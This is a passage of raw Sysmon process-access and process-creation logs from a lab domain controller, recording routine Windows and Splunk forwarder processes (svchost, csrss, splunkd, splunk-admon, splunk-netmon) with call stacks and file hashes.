EL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.642{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:45.502{59A5CD1D-90CD-6005-4001-00000000A301}3052C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.144{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.517{59A5CD1D-90CF-6005-4201-00000000A301}48844396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 